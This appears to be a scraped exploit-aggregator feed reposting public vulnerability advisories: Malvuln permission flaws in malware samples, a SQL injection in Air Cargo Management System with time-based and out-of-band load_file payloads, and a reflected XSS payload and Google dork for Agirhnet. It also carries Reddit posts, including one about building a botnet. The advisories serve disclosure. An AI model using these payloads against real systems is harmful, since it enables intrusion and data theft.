Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Trojan.Win32.Cosmu.abix Insecure Permissions
https://2.bp.blogspot.com/-uXp9StI5Rh0/WWlvYIMdqaI/AAAAAAAAIOg/mHe50EJovPcz8di_9Up4vC4YPRAZ9BUbwCLcBGAs/s1600/h55.png
Trojan.Win32.Cosmu.abix malware suffers from an insecure permissions vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Trojan.Win32.Cosmu.abix Insecure Permissions
https://2.bp.blogspot.com/-uXp9StI5Rh0/WWlvYIMdqaI/AAAAAAAAIOg/mHe50EJovPcz8di_9Up4vC4YPRAZ9BUbwCLcBGAs/s1600/h55.png
Trojan.Win32.Cosmu.abix malware suffers from an insecure permissions vulnerability.
MD5 |
050fd480121e91eb98b91172dae438e6Download
Discovery / credits: Malvuln - malvuln.com (c) 2022
Original source: https://malvuln.com/advisory/b4638a10f7cfdbf39b9fef7539c63852.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln
Threat: Trojan.Win32.Cosmu.abix
Vulnerability: Insecure Permissions
Description: The malware writes several PE files and a dir with insecure permissions under c drive granting change (C) permissions to the authenticated user group. Standard users can rename the executable dropped by the malware to disable it or replace it with their own executable. Then wait for a privileged user to logon to the infected machine to potentially escalate privileges.
Type: PE32
MD5: b4638a10f7cfdbf39b9fef7539c63852
Vuln ID: MVID-2022-0494
Disclosure: 02/21/2022
Exploit/PoC:
C:\dump>attrib -s -h \RECYCLEP
C:\dump>dir \RECYCLEP
Volume in drive C has no label.
Directory of C:\RECYCLEP
0 File(s) 0 bytes
2 Dir(s) 26,756,165,632 bytes free
C:\dump>dir /a \RECYCLEP
Volume in drive C has no label.
Directory of C:\RECYCLEP
07/06/2012 12:40 PM 2,782,863 Pagefile.exe
1 File(s) 2,782,863 bytes
2 Dir(s) 26,756,165,632 bytes free
C:\>cacls RECYCLEP
C:\RECYCLEP BUILTIN\Administrators:(OI)(CI)(ID)F
NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
BUILTIN\Users:(OI)(CI)(ID)R
NT AUTHORITY\Authenticated Users:(ID)C
NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C
C:\>cacls "ntldr~6"
C:\ntldr~6 BUILTIN\Administrators:(ID)F
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Users:(ID)R
NT AUTHORITY\Authenticated Users:(ID)C
C:\>cacls "ntldr~8"
C:\ntldr~8 BUILTIN\Administrators:(ID)F
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Users:(ID)R
NT AUTHORITY\Authenticated Users:(ID)C
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Trojan.Win32.Cosmu.abix Insecure Permissions
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Air Cargo Management System 1.0 SQL Injection
https://4.bp.blogspot.com/-INMz00VTlDg/WWlvPzJvf6I/AAAAAAAAIM4/tZDwU9OuM_wuiTGIuyom6E8lddjUI2D5ACLcBGAs/s1600/h29.png
Air Cargo Management System version 1.0 suffers from a remote SQL injection vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Air Cargo Management System 1.0 SQL Injection
https://4.bp.blogspot.com/-INMz00VTlDg/WWlvPzJvf6I/AAAAAAAAIM4/tZDwU9OuM_wuiTGIuyom6E8lddjUI2D5ACLcBGAs/s1600/h29.png
Air Cargo Management System version 1.0 suffers from a remote SQL injection vulnerability.
MD5 |
85183f5247c94609e25ee0f57b268e89Download
## Title: Air Cargo Management System v1.0 remote SQL-Injections
## Author: nu11secur1ty
## Date: 02.18.2022
## Vendor: https://www.sourcecodester.com/users/tips23
## Software: https://www.sourcecodester.com/php/15188/air-cargo-management-system-php-oop-free-source-code.html
## CVE - Air Cargo Management Systemv1.0
## Description:
The `ref_code` parameter from Air Cargo Management System v1.0 appears
to be vulnerable to SQL injection attacks.
The payload '+(select
load_file('\\\\c5idmpdvfkqycmiqwv299ljz1q7jvej5mtdg44t.https://www.sourcecodester.com/php/15188/air-cargo-management-system-php-oop-free-source-code.html\\hag'))+'
was submitted in the ref_code parameter.
This payload injects a SQL sub-query that calls MySQL's load_file
function with a UNC file path that references a URL on an external
domain.
The application interacted with that domain, indicating that the
injected SQL query was executed.
WARNING: If this is in some external domain, or some subdomain
redirection, or internal whatever, this will be extremely dangerous!
Status: CRITICAL
[+] Payloads:
```mysql
---
Parameter: ref_code (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: p=trace&ref_code=258044'+(select
load_file('\\\\c5idmpdvfkqycmiqwv299ljz1q7jvej5mtdg44t.https://www.sourcecodester.com/php/15188/air-cargo-management-system-php-oop-free-source-code.html\\hag'))+''
AND (SELECT 9012 FROM (SELECT(SLEEP(3)))xEdD) AND 'JVki'='JVki
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/oretnom23/2022/Air-Cargo-Management-System)
## Proof and Exploit:
[href](https://streamable.com/ekn92z)
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Air Cargo Management System 1.0 SQL Injection
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
WordPress 99robots Header Footer Code Manager 1.1.16 Cross Site Scripting
___________________________
@hacking_Attack
@Hacking_Video
WordPress 99robots Header Footer Code Manager 1.1.16 Cross Site Scripting
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
WordPress 99robots Header Footer Code Manager 1.1.16 Cross Site Scripting
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Backdoor.Win32.Agent.baol Insecure Permissions
https://3.bp.blogspot.com/-Q0zmt52Iz_s/WWlvCi1SqRI/AAAAAAAAIKo/56GGQ_7zLBsvaLtYw9wmjI_Jb6z2oza2QCLcBGAs/s1600/h129.png
Backdoor.Win32.Agent.baol malware suffers from an insecure permissions vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Backdoor.Win32.Agent.baol Insecure Permissions
https://3.bp.blogspot.com/-Q0zmt52Iz_s/WWlvCi1SqRI/AAAAAAAAIKo/56GGQ_7zLBsvaLtYw9wmjI_Jb6z2oza2QCLcBGAs/s1600/h129.png
Backdoor.Win32.Agent.baol malware suffers from an insecure permissions vulnerability.
MD5 |
23906c88136df4e887e4feafbfd35ad9Download
Discovery / credits: Malvuln - malvuln.com (c) 2022
Original source: https://malvuln.com/advisory/1f84a5305b65d7f6aa3afa7e2f2bda0e.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln
Threat: Backdoor.Win32.Agent.baol
Vulnerability: Insecure Permissions
Description: The malware writes several PE files with insecure permissions under c drive granting change (C) permissions to the authenticated user group. Standard users can rename the executable dropped by the malware to disable it or replace it with their own executable. Then wait for a privileged user to logon to the infected machine to potentially escalate privileges.
Type: PE32
MD5: 1f84a5305b65d7f6aa3afa7e2f2bda0e
Vuln ID: MVID-2022-0495
Disclosure: 02/21/2022
Exploit/PoC:
C:\>cacls NB_Server.exe
C:\NB_Server.exe BUILTIN\Administrators:(ID)F
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Users:(ID)R
NT AUTHORITY\Authenticated Users:(ID)C
C:\>dir NB_Server.exe
Volume in drive C has no label.
Directory of C:\
02/11/2022 02:10 AM 70,411 NB_Server.exe
1 File(s) 70,411 bytes
0 Dir(s) 26,507,804,672 bytes free
C:\>cacls ds1.exe
C:\ds1.exe BUILTIN\Administrators:(ID)F
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Users:(ID)R
NT AUTHORITY\Authenticated Users:(ID)C
C:\>dir ds1.exe
Volume in drive C has no label.
Directory of C:\
02/11/2022 02:10 AM 0 ds1.exe
1 File(s) 0 bytes
0 Dir(s) 26,506,407,936 bytes free
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Backdoor.Win32.Agent.baol Insecure Permissions
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
ICL ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 Remote File Modification
___________________________
@hacking_Attack
@Hacking_Video
ICL ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 Remote File Modification
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
ICL ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 Remote File Modification
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Agirhnet 1.0 Cross Site Scripting
https://2.bp.blogspot.com/-trS7d3JOSJY/WWlvYoSx4fI/AAAAAAAAIOo/ua-jTrS9avcHrliD3JJHs9ifWyf14eAUwCLcBGAs/s1600/h57.png
Agirhnet version 1.0 suffers from a cross site scripting vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Agirhnet 1.0 Cross Site Scripting
https://2.bp.blogspot.com/-trS7d3JOSJY/WWlvYoSx4fI/AAAAAAAAIOo/ua-jTrS9avcHrliD3JJHs9ifWyf14eAUwCLcBGAs/s1600/h57.png
Agirhnet version 1.0 suffers from a cross site scripting vulnerability.
MD5 |
ef6c4205e2f5214c1f0d90bd7a8a0a2fDownload
# Exploit Title: [Agirhnet] - Reflected XSS via GET
# Google Dork: inurl:agirhnet
# Date: 2022-02-21
# Exploit Author: Daniel Martinez Adan (aDoN90)
# Vendor Homepage: https://agirh.net/
# Version: [app version] 1.0
# CVSS : 6.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)
URL:
https://example.com/AgirhNet/LoadingProgress.aspx?FORM=/%22%0Aconfirm(document.domain)//
vulnerable Parameter : FORM
Payload: /%22%0Aconfirm(document.domain)//
it is compulsory to put the "/" at the beginning of the payload (it has to
recognize it as a URL)
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Agirhnet 1.0 Cross Site Scripting
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Backdoor.Win32.Dsocks.10 Hardcoded Password
https://1.bp.blogspot.com/-HfAgGXf1DOw/WWlvbMysVAI/AAAAAAAAIPI/FubFag34U7YDsw4ZG5KiakYQR-P9HSuiwCLcBGAs/s1600/h72.png
Backdoor.Win32.Dsocks.10 malware suffers from a hardcoded cleartext password vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Backdoor.Win32.Dsocks.10 Hardcoded Password
https://1.bp.blogspot.com/-HfAgGXf1DOw/WWlvbMysVAI/AAAAAAAAIPI/FubFag34U7YDsw4ZG5KiakYQR-P9HSuiwCLcBGAs/s1600/h72.png
Backdoor.Win32.Dsocks.10 malware suffers from a hardcoded cleartext password vulnerability.
MD5 |
7146a3c64c1589283679178640135a9fDownload
Discovery / credits: Malvuln - malvuln.com (c) 2022
Original source: https://malvuln.com/advisory/3a505e7ea1beee556860488e34db8da6.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln
Threat: Backdoor.Win32.Dsocks.10
Vulnerability: Hardcoded Cleartext Password
Description: The malware Coded by Drocon builds and creates backdoor servers, the supplied password is then hardcoded in cleartext in the PE file.
Type: PE32
MD5: 3a505e7ea1beee556860488e34db8da6
Vuln ID: MVID-2022-0496
Dropped files: server.exe
Disclosure: 02/21/2022
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Backdoor.Win32.Dsocks.10 Hardcoded Password
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Getting a Penetration Testing Job
https://www.reddit.com/r/Pentesting/comments/syuxhx/getting_a_penetration_testing_job/
___________________________
@hacking_Attack
@Hacking_Video
https://www.reddit.com/r/Pentesting/comments/syuxhx/getting_a_penetration_testing_job/
___________________________
@hacking_Attack
@Hacking_Video
reddit
Getting a Penetration Testing Job
Posted in r/Pentesting by u/Hackermansam • 1 point and 0 comments
submitted by /u/Hackermansam (https://www.reddit.com/user/Hackermansam)
[link] (https://robertscocca.medium.com/getting-a-penetration-testing-job-cbe662d8444d) [comments] (https://www.reddit.com/r/Pentesting/comments/syuxhx/getting_a_penetration_testing_job/)
___________________________
@hacking_Attack
@Hacking_Video
[link] (https://robertscocca.medium.com/getting-a-penetration-testing-job-cbe662d8444d) [comments] (https://www.reddit.com/r/Pentesting/comments/syuxhx/getting_a_penetration_testing_job/)
___________________________
@hacking_Attack
@Hacking_Video
Reddit
overview for Hackermansam
The u/Hackermansam community on Reddit. Reddit gives you the best of the internet in one place.
hacking: security in practice
Building a BOTNET windows driver manipulation
Hey guys, I'm kinda lost looking for an advice.
I'm second year student for CS, I gained interest in constructing a BOTNET, not for harmful proposes only for my own personal knowledge, and it seems like a complex and fun project to make.
I have bought the following book to gain basic knowledge of what I should be looking at: https://www.amazon.com/Rootkits-Bootkits-Reversing-Malware-Generation/dp/1593277164
I started reading and realized I don't have enough basic knowledge in-order to understand that book. I was trying to figure out what I'm missing, I came across Kernel drivers programing using C/C++,
My question is if it is the missing piece? I have good knowledge of C, C++ and Assembly x86, but not yet knowledge of operating systems and windows especially.
I would love a recommendation for a book or topics I should be researching in-order to gain good comprehension of windows drivers manipulations.
submitted by /u/Pig443
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Building a BOTNET windows driver manipulation
Hey guys, I'm kinda lost looking for an advice.
I'm second year student for CS, I gained interest in constructing a BOTNET, not for harmful proposes only for my own personal knowledge, and it seems like a complex and fun project to make.
I have bought the following book to gain basic knowledge of what I should be looking at: https://www.amazon.com/Rootkits-Bootkits-Reversing-Malware-Generation/dp/1593277164
I started reading and realized I don't have enough basic knowledge in-order to understand that book. I was trying to figure out what I'm missing, I came across Kernel drivers programing using C/C++,
My question is if it is the missing piece? I have good knowledge of C, C++ and Assembly x86, but not yet knowledge of operating systems and windows especially.
I would love a recommendation for a book or topics I should be researching in-order to gain good comprehension of windows drivers manipulations.
submitted by /u/Pig443
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Building a BOTNET windows driver manipulation
Hey guys, I'm kinda lost looking for an advice. I'm second year student for CS, I gained interest in constructing a BOTNET, not for harmful...
hacking: security in practice
This is my first time here, is there a good program for figuring out the password and username of an account on a website?
Maybe something that brute forces it but ideally something a bit more sophisticated. I am doing this on my own website, just to be clear.
submitted by /u/Worth_Talk_817
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
This is my first time here, is there a good program for figuring out the password and username of an account on a website?
Maybe something that brute forces it but ideally something a bit more sophisticated. I am doing this on my own website, just to be clear.
submitted by /u/Worth_Talk_817
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
This is my first time here, is there a good program for figuring...
Maybe something that brute forces it but ideally something a bit more sophisticated.
Operation Cache Pandas
https://www.reddit.com/r/redteamsec/comments/syus3y/operation_cache_pandas/
submitted by /u/dmchell (https://www.reddit.com/user/dmchell)
[link] (https://medium.com/cycraft/supply-chain-attack-targeting-taiwan-financial-sector-bae2f0962934) [comments] (https://www.reddit.com/r/redteamsec/comments/syus3y/operation_cache_pandas/)
___________________________
@hacking_Attack
@Hacking_Video
https://www.reddit.com/r/redteamsec/comments/syus3y/operation_cache_pandas/
submitted by /u/dmchell (https://www.reddit.com/user/dmchell)
[link] (https://medium.com/cycraft/supply-chain-attack-targeting-taiwan-financial-sector-bae2f0962934) [comments] (https://www.reddit.com/r/redteamsec/comments/syus3y/operation_cache_pandas/)
___________________________
@hacking_Attack
@Hacking_Video
reddit
Operation Cache Pandas
Posted in r/redteamsec by u/dmchell • 1 point and 0 comments